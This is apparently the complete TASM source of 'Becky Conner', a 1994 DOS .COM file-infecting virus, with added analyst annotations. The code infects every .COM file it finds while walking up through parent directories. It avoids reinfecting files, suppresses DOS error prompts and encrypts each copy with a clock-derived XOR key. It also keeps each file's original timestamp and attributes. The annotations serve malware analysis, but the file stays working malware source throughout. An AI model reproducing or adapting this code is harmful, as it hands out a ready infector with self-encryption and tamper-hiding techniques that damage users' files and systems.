Assembly Source File  |  1994-09-22  |  11KB  |  268 lines

  1. ;  Becky Conner written by MuTaTiON INTERRUPT
  2. ;  To compile this use TASM /M becky.asm
  3. ;---------
  4.  
  5.  
  6. code    segment public 'code'
  7.         assume  cs:code
  8.         org     100h                              ; All .COM files start here
  9.  
  ; Entry point and main routine (analyst annotations).
  ; Flow visible below: compute the load-address delta, run encrypt_decrypt
  ; over the body, copy the three saved host bytes from `oldjump` back to
  ; 100h, process every *.com match in the current directory and in each
  ; parent reached through '..', print the banner string, undo the DTA,
  ; int 24h and directory changes, then return into the host at 100h.
  ; The bytes from `virus` up to `encrypt_start` lie outside the range that
  ; encrypt_decrypt transforms, so they are stored unchanged in every copy.
  10. start:
  11.         db 0e9h,0,0                               ; E9 00 00: near jmp with displacement 0, i.e. falls through to `virus`
  12. 
  13. virus:
  14.         call    realcode                          ; Pushes the run-time address of `realcode`
  15. realcode:
  16.         nop                                       ; The nops in this stub have no functional effect
  17.         pop     bp                                ; bp = run-time address of `realcode`
  18.         nop
  19.         nop
  20.         sub     bp,offset realcode                ; bp = run-time minus assembled offset; every [bp+offset x] below relies on it
  21.         nop
  22.         nop
  23.         call    encrypt_decrypt                   ; XOR the body with enc_value (no change while enc_value is 00h)
  24. 
  25. encrypt_start   equ     $                         ; Start of the range encrypt_decrypt transforms
  26. 
  27.         lea     si,[bp+offset oldjump]            ; si -> the three saved host bytes
  28.         mov     di,100h                           ; di -> start of the loaded .COM image
  29.         push    di                                ; 100h stays on the stack; the final retn pops it
  30.         movsb                                     ; Copy byte 1 of 3
  31.         movsw                                     ; Copy bytes 2 and 3
  32. 
  33.         lea     dx,[bp+offset dta]                ; Private DTA, so search results do not land in the default DTA at 80h
  34.         call    set_DTA                           ; int 21h / ah=1Ah
  35. 
  36.         mov     ax,3524h                          ; Get int 24h (critical error) vector
  37.         int     21h                               ; Returned in ES:BX
  38.         mov     word ptr [bp+oldint24],bx         ; Save offset
  39.         mov     word ptr [bp+oldint24+2],es       ; Save segment
  40. 
  41.         mov     ah,25h                            ; Set int 24h vector (al is still 24h from the call above)
  42.         lea     dx,[bp+offset int24]              ; DS:DX -> replacement handler, which answers "fail" without prompting
  43.         int     21h
  44. 
  45.         push    cs                                ; ES was overwritten by the get-vector call
  46.         pop     es                                ; ES = CS again
  47. 
  48.         mov     ah,47h                            ; Get the current directory
  49.         mov     dl,0h                             ; On current drive
  50.         lea     si,[bp+offset currentdir]         ; Buffer that receives the path
  51.         int     21h
  52. 
  53. dirloop:
  54.         lea     dx,[bp+offset comfilespec]        ; '*.com'
  55.         call    findfirst                         ; Handles every match in this directory
  56. 
  57.         lea     dx,[bp+offset directory]          ; '..'
  58.         mov     ah,3bh                            ; Change directory
  59.         int     21h
  60.         jnc     dirloop                           ; Repeat in the parent until the change fails
  61. 
  62.         mov     ah,9                              ; Display '$'-terminated string
  63.         lea     dx,[bp+virusname]                 ; Prints Virusname, Author and Made_with: only the last one ends in '$'
  64.         int     21h
  65. 
  66.         mov     ax,2524h                          ; Set int 24h vector
  67.         lds     dx,[bp+offset oldint24]           ; DS:DX = the vector saved earlier
  68.         int     21h
  69. 
  70.         push    cs
  71.         pop     ds                                ; DS = CS again (lds changed it)
  72. 
  73.         lea     dx,[bp+offset currentdir]         ; Path saved before the directory walk
  74.         mov     ah,3bh                            ; Change back to it
  75.         int     21h
  76. 
  77.         mov     dx,80h                            ; Default DTA location
  78.         call    set_dta                           ; Restore it
  79. 
  80.         retn                                      ; Pops the 100h pushed above: control passes to the restored host bytes
  81.  
  ; findfirst / findnext / Findnext2 / quit: iterate over directory matches.
  ; In:  dx -> ASCIIZ file spec (the caller in dirloop passes comfilespec).
  ; Each match is handed to `infection`; control returns to the caller when
  ; DOS sets the carry flag for "no (more) files".
  82. findfirst:
  83.         mov     ah,4eh                            ; Find first file
  84.         mov     cx,7                              ; Attribute mask 7: read-only, hidden and system files are included
  85. 
  86. findnext:
  87.         int     21h                               ; Find first/next; the result is written to the current DTA
  88.         jc      quit                              ; Carry set: nothing (more) found
  89. 
  90.         call    infection                         ; Process the file described in the DTA
  91. 
  92. Findnext2:
  93.         mov     ah,4fh                            ; Find next file
  94.         jmp     findnext                          ; Back to the shared int 21h
  95. 
  96. quit:
  97.         ret
  98.  
  ; infection / CheckCom / quitinfect: decide whether the file described in
  ; the DTA is processed.
  ; Reads the first 1Ah bytes into `buffer`, then returns without changes if
  ; (a) bytes 5-6 of the file name are 'N','D', or
  ; (b) low word of file size == word at buffer+1 + (eof-virus+3), which is
  ;     the layout InfectCom produces and so serves as the self-recognition
  ;     test.
  ; Otherwise control passes to InfectCom. No carry check follows the open
  ; or the read in this block.
  99. infection:
  100.         mov     ax,3d00h                          ; al = 0: read-only access mode (`open` sets ah=3Dh itself)
  101.         call    open                              ; bx = handle
  102. 
  103.         mov     ah,3fh                            ; Read from file
  104.         mov     cx,1ah                            ; 1Ah bytes
  105.         lea     dx,[bp+offset buffer]             ; Into `buffer`
  106.         int     21h
  107. 
  108.         mov     ah,3eh                            ; Close file
  109.         int     21h
  110. 
  111.         mov     ax,word ptr [bp+DTA+35]           ; Name bytes 5 and 6 (the name field starts at DTA+30)
  112.         cmp     ax,'DN'                           ; 'N','D' in memory order, as in COMMAND.COM - presumably the file being skipped
  113.         jz      quitinfect                        ; Match: leave this file alone
  114. 
  115. CheckCom:
  116.         mov     bx,[bp+offset dta+1ah]            ; Low word of the file size from the DTA
  117.         mov     cx,word ptr [bp+buffer+1]         ; Word after the file's first byte (a jmp displacement if that byte is E9h; not verified here)
  118.         add     cx,eof-virus+3                    ; + stored body length + 3-byte jmp
  119. 
  120.         cmp     bx,cx                             ; Equal means the entry jmp targets a body-sized tail
  121.         jz      quitinfect                        ; Treated as already processed
  122.         jmp     infectcom
  123. 
  124. quitinfect:
  125.         ret
  126.  
  ; InfectCom / FinishInfection / get_time / closefile: modify the file
  ; described in the DTA.
  ; In:  bx = low word of the file size (set in CheckCom), `buffer` = first
  ;      bytes of the file.
  ; Visible effects on the file: its first three bytes become E9h plus a
  ; displacement pointing at the old end of file, eof-virus bytes are
  ; appended, and the original attributes and timestamp are put back, so the
  ; length grows while the date and time stay as they were.
  ; The key stored in enc_value is the seconds field of the DOS clock,
  ; re-read until it is non-zero.
  127. InfectCom:
  128.         sub     bx,3                              ; Displacement for a jmp at 100h that targets the old end of file
  129.         lea     si,[bp+buffer]
  130.         lea     di,[bp+oldjump]
  131.         movsw                                     ; Keep the file's original first three bytes
  132.         movsb                                     ; in `oldjump`
  133.         mov     [bp+buffer],byte ptr 0e9h         ; New first byte: near jmp opcode
  134.         mov     word ptr [bp+buffer+1],bx         ; New bytes 2-3: the displacement
  135. 
  136.         mov     cx,3                              ; Number of bytes to write
  137. 
  138.         jmp     finishinfection                   ; Target is the next instruction
  139. FinishInfection:
  140.         push    cx                                ; Save byte count across the calls below
  141.         xor     cx,cx                             ; cx = 0: clear all attributes (removes read-only)
  142.         call    attributes
  143. 
  144.         mov     al,2                              ; Access mode 2: read/write
  145.         call    open                              ; bx = handle
  146. 
  147.         mov     ah,40h                            ; Write to file (pointer is at offset 0 after open)
  148.         lea     dx,[bp+buffer]                    ; Source: the rewritten three bytes
  149.         pop     cx                                ; cx = 3
  150.         int     21h
  151.         jc      closefile                         ; Write failed: skip the append
  152. 
  153.         mov     al,02                             ; Seek origin 2 = end of file
  154.         Call    move_fp
  155. 
  156. get_time:
  157.         mov     ah,2ch                            ; Get system time; DH = seconds
  158.         int     21h
  159.         cmp     dh,0                              ; A zero key would leave the body unchanged
  160.         je      get_time                          ; so poll until the seconds field is non-zero
  161.         mov     [bp+enc_value],dh                 ; Single-byte XOR key for this copy
  162.         call    encrypt_infect                    ; Append the body, XORed with that key
  163. closefile:
  164.         mov     ax,5701h                          ; Set file date/time (bx = handle)
  165.         mov     cx,word ptr [bp+dta+16h]          ; Time recorded in the DTA by the directory search
  166.         mov     dx,word ptr [bp+dta+18h]          ; Date recorded in the DTA
  167.         int     21h
  168. 
  169.         mov     ah,3eh                            ; Close file
  170.         int     21h
  171. 
  172.         xor     cx,cx
  173.         mov     cl,byte ptr [bp+dta+15h]          ; Attribute byte recorded in the DTA
  174.         call    attributes                        ; Put the original attributes back
  175. 
  176.         retn
  177.  
  ; move_fp: seek to offset 0 relative to the origin given in al.
  ; In:  al = origin (the visible caller passes 2 = end of file), bx = handle.
  ; Clobbers ah, cx and dx here; any result of the call is not used by the
  ; visible caller.
  178. move_fp:
  179.         mov     ah,42h                            ; Move file pointer; al holds the origin
  180.         xor     cx,cx                             ; High word of offset = 0
  181.         xor     dx,dx                             ; Low word of offset = 0
  182.         int     21h
  183.         retn
  184.  
  ; set_dta: point the DOS disk transfer area at DS:DX.
  ; In:  dx = offset of the new DTA (the private `dta` buffer on entry,
  ;      80h on exit from the main routine).
  185. set_dta:
  186.         mov     ah,1ah                            ; Set DTA address
  187.         int     21h
  188.         retn
  189.  
  ; open: open the file whose name the directory search left in the DTA.
  ; In:  al = access mode (callers use 0 = read-only, 2 = read/write).
  ; Out: bx = whatever DOS returned in ax. The carry flag is not examined
  ;      here, so on failure bx holds an error code rather than a handle.
  190. open:
  191.         mov     ah,3dh                            ; Open existing file
  192.         lea     dx,[bp+DTA+30]                    ; ASCIIZ file name inside the DTA
  193.         int     21h
  194.         xchg    ax,bx                             ; Returned value into bx (old bx ends up in ax)
  195.         ret
  196.  
  ; attributes: set the attributes of the file named in the DTA.
  ; In:  cx = new attribute bits (0 before the write, the saved byte from
  ;      DTA+15h afterwards).
  197. attributes:
  198.         mov     ax,4301h                          ; Set file attributes to cx
  199.         lea     dx,[bp+DTA+30]                    ; ASCIIZ file name inside the DTA
  200.         int     21h
  201.         ret
  ; int24: replacement critical-error handler installed by the main routine.
  ; Always answers "fail", so a failing disk operation returns an error to
  ; the caller instead of producing the DOS Abort/Retry/Fail prompt.
  202. int24:                                            ; New int 24h (error) handler
  203.         mov     al,3                              ; Action code 3 = fail the call
  204.         iret                                      ; Return from int 24 call
  205.  
  ; Initialised data. All of it sits between encrypt_start and encrypt_end,
  ; so in a copy written with a non-zero enc_value these bytes are stored
  ; XORed with that key and do not appear as plain text in the file.
  206. Virusname db 'Becky Conner - I Hate Mark!',10,13   ; Start of the banner printed with int 21h / ah=9
  207. Author    db 'MuTaTiON INTERRUPT',10,13           ; Author Of This Virus
  208. Made_with db '[NOVEMBER 1994]',10,13,'$'          ; Please do not remove this ('$' ends the printed banner)
  209. 
  210. comfilespec  db  '*.com',0                        ; Search pattern passed to find-first
  211. directory    db '..',0                            ; Parent directory, used to walk upwards
  212. oldjump      db  0cdh,020h,0h                     ; Saved first three host bytes; initial value is int 20h (terminate) plus a 0 byte
  213.  
  ; encrypt_infect: copy the move_begin..move_end routine into `workarea`
  ; and call it there.
  ; `workarea` lies after `eof`, outside the range encrypt_decrypt
  ; transforms, so the copied routine stays executable while the body is
  ; XORed in memory.
  ; In:  bx = handle of the file opened read/write, positioned at its end.
  214. encrypt_infect:
  215.         lea     si,[bp+offset move_begin]         ; Source: the write routine
  216.         lea     di,[bp+offset workarea]           ; Destination: scratch area past `eof`
  217.         mov     cx,move_end-move_begin            ; Routine length in bytes
  218. move_loop:
  219.         movsb                                     ; Byte-by-byte copy
  220.         loop    move_loop
  221.         lea     dx,[bp+offset workarea]
  222.         call    dx                                ; Run the copy
  223.         ret
  224.  
  ; move_begin..move_end: write routine, executed from its copy in
  ; `workarea`.
  ; Steps: XOR the in-memory body with enc_value, write eof-virus bytes
  ; starting at `virus` to the file, XOR the body again to restore it.
  ; `encrypt_end equ $` is immediately followed by the encrypt_decrypt label,
  ; so bp+offset encrypt_end is the run-time address of encrypt_decrypt.
  ; Both calls go through dx, so the target is computed from bp and does not
  ; depend on where this code currently resides.
  ; In:  bx = file handle (saved around each call because encrypt_decrypt
  ;      uses bx).
  225. move_begin    equ     $                           ; Marks beginning of move
  226.         push    bx                                ; Save the file handle
  227.         lea     dx,[bp+offset encrypt_end]        ; Address of encrypt_decrypt
  228.         call    dx                                ; XOR pass 1: body is now in its stored form
  229.         pop     bx                                ; Handle back in bx
  230.         mov     ah,40h                            ; Write to file
  231.         mov     cx,eof-virus                      ; Stub + transformed body + encrypt_decrypt + enc_value
  232.         lea     dx,[bp+offset virus]              ; Where to write from
  233.         int     21h
  234.         push    bx                                ; Save the file handle
  235.         lea     dx,[bp+offset encrypt_end]        ; Address of encrypt_decrypt
  236.         call    dx                                ; XOR pass 2: in-memory body is runnable again
  237.         pop     bx                                ; Handle back in bx
  238.         ret
  239. move_end      equ     $                           ; Marks the end of move
  240. 
  241. encrypt_end   equ     $                           ; End of the range encrypt_decrypt transforms
  242.  
  ; encrypt_decrypt: XOR every byte in [encrypt_start, encrypt_end) with the
  ; byte in enc_value.
  ; XOR with a fixed byte is its own inverse, so the same routine serves both
  ; directions. The routine and enc_value sit after encrypt_end, so they are
  ; stored untransformed in every copy, and the key can be read directly from
  ; the byte that precedes `eof`.
  ; Clobbers: ah, bx, cx, dh.
  243. encrypt_decrypt:
  244.         lea     bx,[bp+encrypt_start]             ; First byte of the range
  245.         mov     cx,encrypt_end-encrypt_start      ; Range length in bytes
  246.         mov     dh,[bp+enc_value]                 ; Single-byte key
  247. encrypt_loop:
  248.         mov     ah,cs:[bx]                        ; Fetch a byte
  249.         xor     ah,dh                             ; Apply the key
  250.         mov     cs:[bx],ah                        ; Store it in place
  251.         inc     bx                                ; Next byte
  252.         loop    encrypt_loop
  253.         ret
  254.  
  ; Key byte, end-of-body marker and scratch storage.
  ; Only the bytes up to `eof` are written to a file (eof-virus bytes);
  ; everything after `eof` is uninitialised working memory.
  255. enc_value     db    00h                           ; XOR key; 00h makes encrypt_decrypt leave the bytes unchanged
  256. 
  257. eof     equ     $                                 ; End of the bytes that get written to a file
  258. 
  259. workarea db     move_end-move_begin dup (?)       ; Receives the copy of move_begin..move_end
  260. currentdir db   64 dup (?)                        ; Directory saved at start-up
  261. dta     db      42 dup (?)                        ; Private DTA used for the directory search
  262. buffer db 1ah dup (?)                             ; First 1Ah bytes of the examined file ("exe header" in the original comment; the visible code uses only bytes 0-2)
  263. oldint24 dd ?                                     ; Storage for old int 24h handler
  264.  
  265. code    ends
  266.         end     start
  267.  
  268.